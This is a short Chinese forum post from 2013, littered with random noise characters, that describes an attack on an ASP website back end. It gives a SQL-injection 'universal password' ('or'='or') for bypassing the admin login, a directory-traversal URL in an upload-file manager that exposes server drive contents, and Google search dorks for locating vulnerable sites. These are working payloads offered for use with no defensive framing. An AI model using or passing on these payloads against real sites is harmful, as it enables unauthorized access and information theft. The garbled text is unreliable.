后台万能密码 'or'='or'
1 }. k# p, Q, M: T
3 C) Z/ t4 {" K后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!3 l1 g9 u% G5 D) Z. \/ I/ M, w) |
admin/uploadfile.asp?currentFolder=/upfiles/../
, m) `: ]! v, l4 U% s. Q
7 O4 U) C+ j. F# O3 {' P漏洞证明:
% {' L& |3 I' ^ K+ g, L0 _ h$ l: {! J. M& u. [
谷歌:inurl:type.asp?id=1 新闻中心% {% R9 t8 @. s8 {" I
或者 :inurl:download_ok.asp?
l' Q E- _& v$ |
* h P; N0 F2 Q. x |
发表于 2013-3-14 20:17:32
收藏
支持
反对